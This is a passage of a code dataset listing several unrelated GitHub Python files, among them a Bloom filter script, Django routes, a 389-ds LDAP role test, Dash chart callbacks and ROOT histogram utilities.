bloom_filter.add(hashed)\n return bloom_filter\n \n# build the bloom filter using list of stream element\nnum_func = 2\nlen_bit_array = 10000\na_list, b_list = generateHashFunc(num_func)\nbloom_filter = buildBloomFilter(city_int, len_bit_array, a_list, b_list)\n\nprediction = (sc.textFile(input_file_path_second) # read file\n .map(lambda line:json.loads(line)) # convert each line to json object\n .map(lambda jLine:jLine['city']) # keep only the city field\n .map(lambda cityStr:makePrediction(cityStr)) \n .collect()\n )\n\noutput_file = open(output_file_path, 'w')\noutput_file.write(' '.join([str(cityInt) for cityInt in prediction]))\noutput_file.close()\n\nprint('Duration:', str(time.time()-startTime))\n\n\n\n","repo_name":"artisan1218/Streaming-Data-Algo","sub_path":"Bloom Filter.py","file_name":"Bloom Filter.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6750921426","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^place/$', views.index, name='list1'),\n url(r'^findlocal/$', views.findlocalindex, name='findlocals'),\n url(r'^dangjin/', views.dangjinindex, name='dangjinindex'),\n url(r'^incheon/', views.incheonindex, name='incheonindex'),\n url(r'^paju/', views.pajuindex, name='pajuindex'),\n url(r'^yangpyeong/', views.yangpyeongindex, name='yangpyeongindex'),\n url(r'^asan/', views.asanindex, name='asanindex'),\n url(r'^andong/', views.andongindex, name='andongindex'),\n #url(r'^place/$', include('traveler.urls')),\n]\n","repo_name":"sosomii/nalzababa0","sub_path":"traveler/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40909111706","text":"# Making class for the node of linked list\nclass Node:\n\n # Each node have a value and a reference(default to None) to the next node in the list\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\n\nd = Node('D') # Pointing to None (meaning last node of the list(tail node))\nc = Node('C', d) # Having value of 'C' and pointing to next node d\nb = Node('B', c)\na = Node('A', b)\n\n\ndef linked_list_to_array_loop(head):\n current = head\n array = []\n\n while (current != None):\n array.append(current.val)\n current = current.next\n return array\n\n\narr = linked_list_to_array_loop(a)\nprint(arr)\n\n\ndef find_values(head, array):\n if (head == None):\n return\n\n array.append(head.val)\n find_values(head.next, array)\n\n\ndef linked_list_to_array_recursion(head):\n array = []\n find_values(head, array)\n return array\n\n\narr2 = linked_list_to_array_recursion(a)\nprint(arr2)\n","repo_name":"RocTanweer/python_dsa","sub_path":"linkedList/operations/toArray/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13404703851","text":"import time\nimport ldap\nimport logging\nimport pytest\nfrom lib389 import Entry\nfrom lib389._constants import *\nfrom lib389.properties import *\nfrom lib389.tasks import *\nfrom lib389.utils import *\nfrom lib389.topologies import topology_st as topo\n\npytestmark = pytest.mark.tier2\n\nDEBUGGING = os.getenv(\"DEBUGGING\", default=False)\nif DEBUGGING:\n logging.getLogger(__name__).setLevel(logging.DEBUG)\nelse:\n logging.getLogger(__name__).setLevel(logging.INFO)\nlog = logging.getLogger(__name__)\n\nINDEX_DN = 'cn=index,cn=Second_Backend,cn=ldbm database,cn=plugins,cn=config'\nSUFFIX_DN = 'cn=Second_Backend,cn=ldbm database,cn=plugins,cn=config'\nMY_SUFFIX = \"o=hang.com\"\nUSER_DN = 'uid=user,' + MY_SUFFIX\n\n\ndef test_ticket49192(topo):\n \"\"\"Trigger deadlock when removing suffix\n \"\"\"\n\n #\n # Create a second suffix/backend\n #\n log.info('Creating second backend...')\n topo.standalone.backends.create(None, properties={\n BACKEND_NAME: \"Second_Backend\",\n 'suffix': \"o=hang.com\",\n })\n try:\n topo.standalone.add_s(Entry((\"o=hang.com\", {\n 'objectclass': 'top organization'.split(),\n 'o': 'hang.com'})))\n except ldap.LDAPError as e:\n log.fatal('Failed to create 2nd suffix: error ' + e.args[0]['desc'])\n assert False\n\n #\n # Add roles\n #\n log.info('Adding roles...')\n try:\n topo.standalone.add_s(Entry(('cn=nsManagedDisabledRole,' + MY_SUFFIX, {\n 'objectclass': ['top', 'LdapSubEntry',\n 'nsRoleDefinition',\n 'nsSimpleRoleDefinition',\n 'nsManagedRoleDefinition'],\n 'cn': 'nsManagedDisabledRole'})))\n except ldap.LDAPError as e:\n log.fatal('Failed to add managed role: error ' + e.args[0]['desc'])\n assert False\n\n try:\n topo.standalone.add_s(Entry(('cn=nsDisabledRole,' + MY_SUFFIX, {\n 'objectclass': ['top', 'LdapSubEntry',\n 'nsRoleDefinition',\n 'nsComplexRoleDefinition',\n 'nsNestedRoleDefinition'],\n 'cn': 'nsDisabledRole',\n 'nsRoledn': 'cn=nsManagedDisabledRole,' + MY_SUFFIX})))\n except ldap.LDAPError as e:\n log.fatal('Failed to add nested role: error ' + e.args[0]['desc'])\n assert False\n\n try:\n topo.standalone.add_s(Entry(('cn=nsAccountInactivationTmp,' + MY_SUFFIX, {\n 'objectclass': ['top', 'nsContainer'],\n 'cn': 'nsAccountInactivationTmp'})))\n except ldap.LDAPError as e:\n log.fatal('Failed to add container: error ' + e.args[0]['desc'])\n assert False\n\n try:\n topo.standalone.add_s(Entry(('cn=\\\"cn=nsDisabledRole,' + MY_SUFFIX + '\\\",cn=nsAccountInactivationTmp,' + MY_SUFFIX, {\n 'objectclass': ['top', 'extensibleObject', 'costemplate',\n 'ldapsubentry'],\n 'nsAccountLock': 'true'})))\n except ldap.LDAPError as e:\n log.fatal('Failed to add cos1: error ' + e.args[0]['desc'])\n assert False\n\n try:\n topo.standalone.add_s(Entry(('cn=nsAccountInactivation_cos,' + MY_SUFFIX, {\n 'objectclass': ['top', 'LdapSubEntry', 'cosSuperDefinition',\n 'cosClassicDefinition'],\n 'cn': 'nsAccountInactivation_cos',\n 'cosTemplateDn': 'cn=nsAccountInactivationTmp,' + MY_SUFFIX,\n 'cosSpecifier': 'nsRole',\n 'cosAttribute': 'nsAccountLock operational'})))\n except ldap.LDAPError as e:\n log.fatal('Failed to add cos2 : error ' + e.args[0]['desc'])\n assert False\n\n #\n # Add test entry\n #\n try:\n topo.standalone.add_s(Entry((USER_DN, {\n 'objectclass': 'top extensibleObject'.split(),\n 'uid': 'user',\n 'userpassword': 'password',\n })))\n except ldap.LDAPError as e:\n log.fatal('Failed to add user: error ' + e.args[0]['desc'])\n assert False\n\n #\n # Inactivate the user account\n #\n try:\n topo.standalone.modify_s(USER_DN,\n [(ldap.MOD_ADD,\n 'nsRoleDN',\n ensure_bytes('cn=nsManagedDisabledRole,' + MY_SUFFIX))])\n except ldap.LDAPError as e:\n log.fatal('Failed to disable user: error ' + e.args[0]['desc'])\n assert False\n\n time.sleep(1)\n\n # Bind as user (should fail)\n try:\n topo.standalone.simple_bind_s(USER_DN, 'password')\n log.error(\"Bind incorrectly worked\")\n assert False\n except ldap.UNWILLING_TO_PERFORM:\n log.info('Got error 53 as expected')\n except ldap.LDAPError as e:\n log.fatal('Bind has unexpected error ' + e.args[0]['desc'])\n assert False\n\n # Bind as root DN\n try:\n topo.standalone.simple_bind_s(DN_DM, PASSWORD)\n except ldap.LDAPError as e:\n log.fatal('RootDN Bind has unexpected error ' + e.args[0]['desc'])\n assert False\n\n #\n # Delete suffix\n #\n log.info('Delete the suffix and children...')\n try:\n index_entries = topo.standalone.search_s(\n SUFFIX_DN, ldap.SCOPE_SUBTREE, 'objectclass=top')\n except ldap.LDAPError as e:\n log.error('Failed to search: %s - error %s' % (SUFFIX_DN, str(e)))\n\n for entry in reversed(index_entries):\n try:\n log.info(\"Deleting: \" + entry.dn)\n if entry.dn != SUFFIX_DN and entry.dn != INDEX_DN:\n topo.standalone.search_s(entry.dn,\n ldap.SCOPE_ONELEVEL,\n 'objectclass=top')\n topo.standalone.delete_s(entry.dn)\n except ldap.LDAPError as e:\n log.fatal('Failed to delete entry: %s - error %s' %\n (entry.dn, str(e)))\n assert False\n\n log.info(\"Test Passed\")\n\n\nif __name__ == '__main__':\n # Run isolated\n # -s for DEBUG mode\n CURRENT_FILE = os.path.realpath(__file__)\n pytest.main(\"-s %s\" % CURRENT_FILE)\n\n","repo_name":"389ds/389-ds-base","sub_path":"dirsrvtests/tests/tickets/ticket49192_test.py","file_name":"ticket49192_test.py","file_ext":"py","file_size_in_byte":6065,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"31"} +{"seq_id":"31022315470","text":"from dash import dcc\nfrom dash import html\nfrom dash.dependencies import Input, Output\nimport pandas as pd\nimport plotly.express as px\n\n# Stat columns, to be used for ordering:\nSTAT_COLS = ['HP', 'Str', 'Mag', 'Dex', 'Spd', 'Def', 'Res', 'Lck', 'Bld']\n\n\ndef bar_buttons(df):\n # Create the character drop down menus:\n character_dropdown_1 = dcc.Dropdown(\n id='character-1-dropdown',\n options=[{'label': name, 'value': name} for name in df['Name'].unique()],\n value=df['Name'].unique()[0]\n )\n character_dropdown_2 = dcc.Dropdown(\n id='character-2-dropdown',\n options=[{'label': name, 'value': name} for name in df['Name'].unique()],\n value=df['Name'].unique()[1]\n )\n\n # Create the level slider button:\n level_slider = dcc.Slider(\n id='level-slider',\n min=df['int_lev'].min(),\n max=df['int_lev'].max(),\n step=1,\n value=df['int_lev'].min(),\n marks={i: str(i) for i in range(df['int_lev'].min(), df['int_lev'].max() + 1)}\n )\n\n # Create the class dropdowns:\n class_dropdown_1 = dcc.Dropdown(\n id='class-dropdown-1'\n )\n\n class_dropdown_2 = dcc.Dropdown(\n id='class-dropdown-2'\n )\n\n buttons = [character_dropdown_1, character_dropdown_2, class_dropdown_1, class_dropdown_2, level_slider]\n\n return buttons\n\n\ndef bar_layout(app, buttons):\n # Define the app layout\n app.layout = html.Div([\n dcc.Graph(id='metric-chart'),\n html.Div([\n # Add the character dropdowns\n html.Div([\n html.Label('Character 1'),\n buttons[0]\n ], style={'width': '40%', 'display': 'inline-block', 'padding-left': '50px', 'padding-right': '50px'}),\n\n html.Div([\n html.Label('Character 2'),\n buttons[1]\n ], style={'width': '40%', 'display': 'inline-block'}),\n ], style={'width': '100%', 'display': 'inline-block'}),\n\n html.Div([\n # Add the class dropdowns\n html.Div([\n html.Label('Class 1'),\n buttons[2]\n ], style={'width': '40%', 'display': 'inline-block', 'padding-left': '50px', 'padding-right': '50px'}),\n\n html.Div([\n html.Label('Class 2'),\n buttons[3]\n ], style={'width': '40%', 'display': 'inline-block'}),\n ], style={'width': '100%', 'display': 'inline-block'}),\n\n html.Div([\n html.Label('Internal Level', style={'text-align': 'center'}),\n buttons[4]\n ], style={'padding-top': '20px', 'text-align': 'center'})\n ])\n\n return app\n\n\ndef bar_callbacks(app, df):\n @app.callback(\n [Output('level-slider', 'min'),\n Output('level-slider', 'value')],\n [Input('character-1-dropdown', 'value'),\n Input('character-2-dropdown', 'value')]\n )\n def update_slider_min_and_value(character_name_1, character_name_2):\n min_level_1 = df[df['Name'] == character_name_1]['int_lev'].min()\n min_level_2 = df[df['Name'] == character_name_2]['int_lev'].min()\n min_level = max(min_level_1, min_level_2)\n return min_level, min_level\n\n # Define the callback to update the class dropdowns\n @app.callback(\n [Output('class-dropdown-1', 'options'),\n Output('class-dropdown-1', 'value'),\n Output('class-dropdown-2', 'options'),\n Output('class-dropdown-2', 'value')],\n [Input('character-1-dropdown', 'value'),\n Input('character-2-dropdown', 'value')]\n )\n def update_class_dropdowns(character_name_1, character_name_2):\n # Get the list of available classes for the selected character\n class_options_1 = [{'label': c, 'value': c} for c in df[df['Name'] == character_name_1]['Promo_Class'].unique()]\n class_options_2 = [{'label': c, 'value': c} for c in df[df['Name'] == character_name_2]['Promo_Class'].unique()]\n\n # Return the options for both dropdowns, and set the default value to the first class in the list\n return class_options_1, class_options_1[0]['value'], class_options_2, class_options_2[0]['value']\n\n # Define the callback to update the chart\n @app.callback(\n Output('metric-chart', 'figure'),\n [Input('character-1-dropdown', 'value'),\n Input('character-2-dropdown', 'value'),\n Input('level-slider', 'value'),\n Input('class-dropdown-1', 'value'),\n Input('class-dropdown-2', 'value'),\n ]\n )\n def update_metric_chart(character_name_1, character_name_2, level, class_name_1, class_name_2):\n # Filter the dataframe to include the selected characters and classes at the given level\n filt_df = df[(df['Name'].isin([character_name_1, character_name_2])) &\n (df['int_lev'] == level) &\n (df['Promo_Class'].isin([class_name_1, class_name_2]))]\n\n # Return the characters current class (may be different from eventual promotion):\n curr_class1 = filt_df.loc[(filt_df['Name'] == character_name_1) & (filt_df['Promo_Class'] == class_name_1\n )]['Class'].reset_index(drop=True)[0]\n curr_class2 = filt_df.loc[(filt_df['Name'] == character_name_2) & (filt_df['Promo_Class'] == class_name_2\n )]['Class'].reset_index(drop=True)[0]\n\n # If characters have same name, add class to name so bar chart differentiates between them:\n if (character_name_1 == character_name_2) & (class_name_1 != class_name_2):\n filt_df.loc[(filt_df['Name'] == character_name_1) & (filt_df['Promo_Class'] == class_name_1\n ), 'Name'] = '%s (%s)' % (\n character_name_1, class_name_1)\n filt_df.loc[(filt_df['Name'] == character_name_2) & (filt_df['Promo_Class'] == class_name_2\n ), 'Name'] = '%s (%s)' % (\n character_name_2, class_name_2)\n\n # Re-order to ensure correct ordering of bar chart corresponding to drop down selectors:\n filt_df['Metric'] = pd.Categorical(filt_df['Metric'], STAT_COLS)\n if class_name_1 != class_name_2:\n filt_df['Promo_Class'] = pd.Categorical(filt_df['Promo_Class'], [class_name_1, class_name_2])\n filt_df = filt_df.sort_values(['Metric', 'Promo_Class'])\n\n # Create the bar chart using Plotly Express\n fig = px.bar(filt_df, x='Metric', y='Value', color='Name', barmode='group') # , color_discrete_map=color_dict\n\n # Update the chart title and axis labels\n fig.update_layout(\n title=f'{character_name_1} ({curr_class1}) vs. {character_name_2} ({curr_class2}) at Level {level}')\n fig.update_layout(title_x=0.5)\n fig.update_xaxes(title='Metric')\n fig.update_yaxes(title='Value')\n\n return fig\n\n return app\n\n\ndef scatter_buttons(df):\n x_dropdown = dcc.Dropdown(\n id='x-axis',\n options=[{'label': i, 'value': i} for i in df['Metric'].unique()],\n value='HP'\n )\n y_dropdown = dcc.Dropdown(\n id='y-axis',\n options=[{'label': i, 'value': i} for i in df['Metric'].unique()],\n value='Str'\n )\n slider = dcc.Slider(\n id='level-slider',\n min=df['int_lev'].min(),\n max=df['int_lev'].max(),\n step=1,\n value=df['int_lev'].min(),\n marks={str(level): str(level) for level in df['int_lev'].unique()}\n )\n\n return [x_dropdown, y_dropdown, slider]\n\n\ndef scatter_layout(app, buttons):\n # Define the layout\n app.layout = html.Div([\n dcc.Graph(id='scatterplot'),\n html.Div([\n # Add the metric dropdowns\n html.Div([\n buttons[0]\n ], style={'width': '40%', 'display': 'inline-block', 'padding-left': '50px', 'padding-right': '50px'}),\n\n html.Div([\n buttons[1]\n ], style={'width': '40%', 'display': 'inline-block'}),\n ], style={'width': '100%', 'display': 'inline-block'}),\n\n html.Div([\n html.Label('Internal Level', style={'text-align': 'center'}),\n buttons[2]\n ], style={'padding-top': '20px', 'text-align': 'center'})\n ])\n\n return app\n\n\ndef scatter_callbacks(app, df):\n # Define the callback to update the scatterplot\n @app.callback(\n Output('scatterplot', 'figure'),\n Input('x-axis', 'value'),\n Input('y-axis', 'value'),\n Input('level-slider', 'value')\n )\n def update_scatterplot(x_axis, y_axis, level):\n filtered_df = df[df['int_lev'] == level]\n x_df = filtered_df[filtered_df['Metric'] == x_axis].rename(columns={'Value': x_axis})\n y_df = filtered_df[filtered_df['Metric'] == y_axis].rename(columns={'Value': y_axis})\n merged_df = x_df.merge(y_df, on=['Name', 'int_lev', 'Class', 'Promo_Class'])\n\n fig = px.scatter(merged_df, x=x_axis, y=y_axis,\n color='Name', hover_data=['Name', 'Promo_Class', x_axis, y_axis])\n\n fig.update_layout(transition_duration=500)\n return fig\n\n return app","repo_name":"williamdee1/Fire_Emblem","sub_path":"modules/dash_viz.py","file_name":"dash_viz.py","file_ext":"py","file_size_in_byte":9253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17106310630","text":"def magic_index(array, start, end):\n mid_index = (start + end) // 2\n print((\"array:{0}\").format(array))\n print((\"midindex:{0}\").format(mid_index))\n if array[mid_index] == mid_index:\n return mid_index\n elif mid_index > array[mid_index]:\n return magic_index(array, mid_index+1, end)\n else:\n return magic_index(array, start, mid_index)\n\n\ndef magic_index_distinct(array, start, end):\n if end < start:\n return False\n mid_index = (start + end) // 2\n mid_value = array[mid_index]\n if array[mid_index] == mid_index:\n return mid_index\n left_index = min(mid_index-1, mid_value)\n left = magic_index_distinct(array, start, left_index)\n # print(left)\n if left:\n return left\n right_index = max(mid_index+1, mid_value)\n right = magic_index_distinct(array, right_index, end)\n return right\n\n\nif __name__ == \"__main__\":\n # array = [-40, -20, -1, 1, 2, 3, 5, 7, 9, 12, 13]\n\n # print(magic_index(array, start, end))\n array = [-10, -5, 2, 2, 2, 3, 4, 7, 9, 12, 13]\n start = 0\n end = len(array)-1\n print(magic_index_distinct(array, start, end))\n","repo_name":"xiaolinangela/cracking-the-coding-interview-soln","sub_path":"Ch8_RecursionDP/8.3-MagicIndex.py","file_name":"8.3-MagicIndex.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30307189728","text":"def hola2(a):\n divisores=0\n mitadE=(a+1)//2\n for i in range(1, mitadE+1):\n if (a+1)%i==0:\n divisores=divisores+1\n\n\n if divisores<2 and a%6!=0:\n print(\"es un primo hermano\")\n else:\n print(\"no es primo hermano\") \n\nx=int(input(\"El numero a probar es: \"))\nhola2(x)","repo_name":"julife12/rdygu","sub_path":"primohermano.py","file_name":"primohermano.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22574644847","text":"'''\nCreated on 20 Nov 2012\n\n@author: kreczko\n'''\nfrom __future__ import division\nfrom rootpy.plotting import Hist, Graph\nfrom rootpy import asrootpy\nfrom ROOT import TGraphAsymmErrors\nfrom array import array\nfrom itertools import izip\nfrom rootpy.plotting.hist import Hist2D\nimport random\nimport string\nfrom math import sqrt\nfrom copy import deepcopy\nfrom .file_utilities import read_data_from_JSON\nfrom .logger import log\nhu_log = log[\"tools/hist_utilities\"]\n\ndef hist_to_value_error_tuplelist( hist ):\n values = list( hist.y() )\n errors = []\n add_error = errors.append\n get_bin_error = hist.GetBinError\n for bin_i in range( len( values ) ):\n add_error( get_bin_error( bin_i + 1 ) )\n return zip( values, errors )\n\ndef hist_to_value_list( hist ):\n values = list( hist.y() )\n return values\n\ndef hist_to_binEdges_list( hist ):\n edges = list(hist.xedges())\n return edges\n\ndef hist2d_to_binEdges_list( hist ):\n xedges = list(hist.xedges())\n yedges = list(hist.yedges())\n return xedges, yedges\n\ndef values_and_errors_to_hist( values, errors, bins ):\n assert( len( bins ) == len( values ) + 1 )\n if len( errors ) == 0:\n errors = [0.] * len( values )\n value_error_tuplelist = zip( values, errors )\n return value_error_tuplelist_to_hist( value_error_tuplelist, bins )\n\ndef value_errors_tuplelist_to_graph( value_errors_tuplelist, bin_edges, is_symmetric_errors=False ):\n value_error_tuplelist = []\n if is_symmetric_errors:\n value_error_tuplelist = [( value, 0 ) for value, error in value_errors_tuplelist]\n else:\n value_error_tuplelist = [( value, 0 ) for value, lower_error, upper_error in value_errors_tuplelist]\n\n hist = value_error_tuplelist_to_hist( value_error_tuplelist, bin_edges )\n rootpy_graph = asrootpy( TGraphAsymmErrors( hist ) )\n\n set_lower_error = rootpy_graph.SetPointEYlow\n set_upper_error = rootpy_graph.SetPointEYhigh\n\n if is_symmetric_errors:\n for point_i, ( value, error ) in enumerate( value_errors_tuplelist ):\n set_lower_error( point_i, error )\n set_upper_error( point_i, error )\n else:\n for point_i, ( value, lower_error, upper_error ) in enumerate( value_errors_tuplelist ):\n set_lower_error( point_i, lower_error )\n set_upper_error( point_i, upper_error )\n\n return rootpy_graph\n\ndef graph_to_value_errors_tuplelist( graph ):\n values = list( graph.y() )\n errors_high = list( graph.yerrh() )\n errors_low = list( graph.yerrl() )\n value_error_tuplelist = zip( values, errors_low, errors_high )\n return value_error_tuplelist\n\n@hu_log.trace()\ndef value_error_tuplelist_to_hist( value_error_tuplelist, bin_edges ):\n assert( len( bin_edges ) == len( value_error_tuplelist ) + 1 )\n rootpy_hist = Hist( bin_edges, type = 'D' )\n set_bin_value = rootpy_hist.SetBinContent\n set_bin_error = rootpy_hist.SetBinError\n for bin_i, ( value, error ) in enumerate( value_error_tuplelist ):\n set_bin_value( bin_i + 1, value )\n set_bin_error( bin_i + 1, error )\n return rootpy_hist\n\ndef value_tuplelist_to_hist( value_tuplelist, bin_edges ):\n assert( len( bin_edges ) == len( value_tuplelist ) + 1 )\n rootpy_hist = Hist( bin_edges, type = 'D' )\n set_bin_value = rootpy_hist.SetBinContent\n for bin_i, value in enumerate( value_tuplelist ):\n set_bin_value( bin_i + 1, value )\n return rootpy_hist\n\ndef matrix_to_hist2d( value_matrix, x_edges, y_edges ):\n '''\n numpy matrix of values and bin edges -> Hist2D\n '''\n from root_numpy import array2hist\n\n rootpy_hist = Hist2D( x_edges, y_edges, type = 'D' )\n array2hist(value_matrix, rootpy_hist)\n\n # set_bin_value = rootpy_hist.SetBinContent\n # for x in range(0, len(x_edges)-1):\n # for y in range(0, len(y_edges)-1):\n # set_bin_value( x+1, y+1, value_matrix.item(y, x) )\n return rootpy_hist\n\ndef hist2d_to_matrix( hist2d ):\n '''\n hist2d to matrix + bin edges\n '''\n from root_numpy import hist2array\n values = hist2array(hist2d)\n xedges = list(hist2d.xedges())\n yedges = list(hist2d.yedges())\n return values, xedges, yedges\n\ndef sum_histograms( histogram_dict, sample_list ):\n # histogram_dict = {sample:{histogram_name:histogram}\n summary = {}\n preparation = {}\n for sample in sample_list:\n sample_hists = histogram_dict[sample]\n for histogram_name, histogram in sample_hists.iteritems():\n if not preparation.has_key( histogram_name ):\n preparation[histogram_name] = []\n preparation[histogram_name].append( histogram )\n for histogram_name, histogram_list in preparation.iteritems():\n summary[histogram_name] = sum( histogram_list )\n return summary\n\ndef scale_histogram_errors( histogram, total_error ):\n bins_number = histogram.GetNbinsX()\n current_total_error = sum( histogram.yerravg() )\n scale_factor = total_error / current_total_error\n\n for bin_i in range( bins_number ):\n histogram.SetBinError( bin_i + 1, scale_factor * histogram.GetBinError( bin_i + 1 ) )\n\ndef prepare_histograms( histograms, rebin = 1, scale_factor = 1.,\n normalisation = {}, exclude_from_scaling = ['data'] ):\n for sample, histogram_dict in histograms.iteritems():\n # check if this is a simple dict\n if histogram_dict.__class__.__name__ == 'Hist':\n h = histogram_dict\n scale = 1.\n norm = None\n if not sample in exclude_from_scaling:\n scale = scale_factor\n if sample in normalisation.keys():\n norm = normalisation[sample]\n scale_and_rebin_histogram( histogram = h, scale_factor = scale,\n normalisation = norm, rebin = rebin )\n continue\n # otherwise go a level deeper\n for _, histogram in histogram_dict.iteritems():\n scale = 1.\n norm = None\n if not sample in exclude_from_scaling:\n scale = scale_factor\n if sample in normalisation.keys():\n norm = normalisation[sample]\n scale_and_rebin_histogram( histogram = histogram,\n scale_factor = scale,\n normalisation = norm, rebin = rebin )\n\ndef scale_and_rebin_histogram(histogram, scale_factor,\n normalisation = None,\n rebin = 1):\n histogram.Rebin( rebin )\n histogram.Scale( scale_factor )\n if not normalisation is None and histogram.Integral() != 0:\n histogram.Scale( normalisation[0] / histogram.Integral() )\n scale_histogram_errors( histogram, normalisation[1] )\n\ndef rebin_asymmetric( histogram, bins ):\n bin_array = array( 'd', bins )\n nbins = len( bin_array ) - 1\n new_histogram = histogram.Rebin( nbins, histogram.GetName() + 'new', bin_array )\n return asrootpy( new_histogram )\n\n@hu_log.trace()\ndef spread_x( histograms, bin_edges ):\n \"\"\"\n Usually when plotting multiple histograms with same x-values and\n similar y-values their markers will overlap. This function spreads\n the data points across a bin. It creates a set of graphs with the\n same y-values but different x.\n\n @param histograms: list of histograms with same binning\n @param bin_edges: the bin edges of the histograms\n \"\"\"\n # construct bins from the bin edges\n bins = [( bin_lower, bin_upper ) for bin_lower, bin_upper in izip( bin_edges[:-1], bin_edges[1:] )]\n # now get the bin widths\n bin_widths = [abs( bin_i[1] - bin_i[0] ) for bin_i in bins]\n # number of histograms\n number_of_hists = len( histograms )\n # and divide the bins into equidistant bits leaving some space to the bin edges\n x_locations = []\n add_locations = x_locations.append\n for bin_lower, width in izip( bin_edges, bin_widths ):\n x_step = width / ( 1.0 * number_of_hists + 1 ) # +1 due to spacing to bin edge\n add_locations( [bin_lower + n * x_step for n in range( 1, number_of_hists + 1 )] )\n\n # transpose\n x_locations = map( list, zip( *x_locations ) )\n\n graphs = []\n for histogram, x_coordinates in zip( histograms, x_locations ):\n g = Graph( histogram )\n for i, ( x, y ) in enumerate( zip( x_coordinates, histogram.y() ) ):\n g.SetPoint( i, x, y )\n\n graphs.append( g )\n\n return graphs\n\ndef limit_range_y( histogram ):\n \"\"\"\n Calculates the minimum and maximum values of the histogram y values\n Can be useful for setting limits of log plots\n \"\"\"\n tuple_list = hist_to_value_error_tuplelist( histogram )\n min_value = map( min, zip( *tuple_list ) )[0]\n max_value = map( max, zip( *tuple_list ) )[0]\n return min_value, max_value\n\ndef fix_overflow( hist ):\n ''' Moves entries from the overflow bin into the last bin as we treat the last bin as everything > last_bin.lower_edge.\n This is to fix a bug in the unfolding workflow where we neglect this treatment.'''\n\n if 'TH1' in hist.class_name():\n last_bin = hist.nbins()\n overflow_bin = last_bin + 1\n overflow = hist.GetBinContent( overflow_bin )\n overflow_error= hist.GetBinError( overflow_bin )\n\n new_last_bin_content = hist.GetBinContent( last_bin ) + overflow\n new_last_bin_error = sqrt(hist.GetBinError( last_bin ) ** 2 + overflow_error ** 2)\n\n hist.SetBinContent( last_bin, new_last_bin_content )\n hist.SetBinError( last_bin, new_last_bin_error )\n hist.SetBinContent( overflow_bin, 0. )\n elif 'TH2' in hist.class_name():\n last_bin_x = hist.nbins()\n last_bin_y = hist.nbins( axis = 1 )\n overflow_bin_x = last_bin_x + 1\n overflow_bin_y = last_bin_y + 1\n # first all y-overflow\n for x in range( 1, overflow_bin_x +1):\n overflow_y = hist.GetBinContent( x, overflow_bin_y )\n overflow_error_y = hist.GetBinError( x, overflow_bin_y )\n\n last_bin_content_y = hist.GetBinContent( x, last_bin_y )\n last_bin_error_y = hist.GetBinError( x, last_bin_y )\n\n hist.SetBinContent( x, overflow_bin_y, 0. )\n hist.SetBinContent( x, last_bin_y, overflow_y + last_bin_content_y )\n hist.SetBinError( x, last_bin_y, sqrt( overflow_error_y ** 2 + last_bin_error_y ** 2 ) )\n # now all x-overflow\n for y in range( 1, overflow_bin_y +1):\n overflow_x = hist.GetBinContent( overflow_bin_x, y )\n overflow_error_x = hist.GetBinError( overflow_bin_x, y )\n\n last_bin_content_x = hist.GetBinContent( last_bin_x, y )\n last_bin_error_x = hist.GetBinError( last_bin_x, y )\n\n hist.SetBinContent( overflow_bin_x, y, 0. )\n hist.SetBinContent( last_bin_x, y, overflow_x + last_bin_content_x )\n hist.SetBinError( last_bin_x, y, sqrt( overflow_error_x ** 2 + last_bin_error_x ** 2 ) )\n # and now the final bin (both x and y overflow)\n overflow_x_y = hist.GetBinContent( overflow_bin_x, overflow_bin_y )\n last_bin_content_x_y = hist.GetBinContent( last_bin_x, last_bin_y )\n hist.SetBinContent( overflow_bin_x, overflow_bin_y, 0. )\n hist.SetBinContent( last_bin_x, last_bin_y, overflow_x_y + last_bin_content_x_y )\n else:\n raise Exception(\"Unknown type of histogram in fix_overflow\")\n\n hist = transfer_values_without_overflow(hist)\n return hist\n\ndef transfer_values_without_overflow( histogram ):\n if histogram == None:\n return histogram\n\n histogram_new = None\n if 'TH1' in histogram.class_name():\n histogram_new = Hist( list( histogram.xedges() ), type = 'D' )\n n_bins = histogram_new.nbins()\n for i in range(1, n_bins + 1):\n histogram_new.SetBinContent(i, histogram.GetBinContent(i))\n histogram_new.SetBinError(i, histogram.GetBinError(i))\n elif 'TH2' in histogram.class_name():\n histogram_new = Hist2D( list( histogram.xedges() ), list( histogram.yedges() ), type = 'D' )\n n_bins_x = histogram_new.nbins()\n n_bins_y = histogram_new.nbins(axis=1)\n for i in range(1, n_bins_x + 1):\n for j in range(1, n_bins_y + 1):\n histogram_new.SetBinContent(i,j, histogram.GetBinContent(i, j))\n histogram_new.SetBinError(i,j, histogram.GetBinError(i, j))\n else:\n raise Exception(\"Unknown type of histogram in transfer_values_without_overflow\")\n\n return histogram_new\n\ndef rebin_2d( hist_2D, bin_edges_x, bin_edges_y ):\n # since there is no easy way to rebin a 2D histogram, lets make it from\n # scratch\n random_string = ''.join( random.choice( string.ascii_uppercase + string.digits ) for _ in range( 6 ) )\n hist = Hist2D( bin_edges_x, bin_edges_y, name = hist_2D.GetName() + '_rebinned_' + random_string )\n n_bins_x = hist_2D.nbins()\n n_bins_y = hist_2D.nbins( axis = 1 )\n\n fill = hist.Fill\n get = hist_2D.GetBinContent\n x_axis_centre = hist_2D.GetXaxis().GetBinCenter\n y_axis_centre = hist_2D.GetYaxis().GetBinCenter\n for i in range( 0, n_bins_x + 1 ):\n for j in range( 0, n_bins_y + 1 ):\n fill( x_axis_centre( i ), y_axis_centre( j ), get( i, j ) )\n\n return hist\n\ndef conditional_rebin( histogram, bin_edges ):\n histogram_ = deepcopy(histogram)\n current_nbins = histogram.nbins()\n new_nbins = len( bin_edges ) - 1\n # check if already have the correct number of bins\n if not current_nbins == new_nbins:\n # 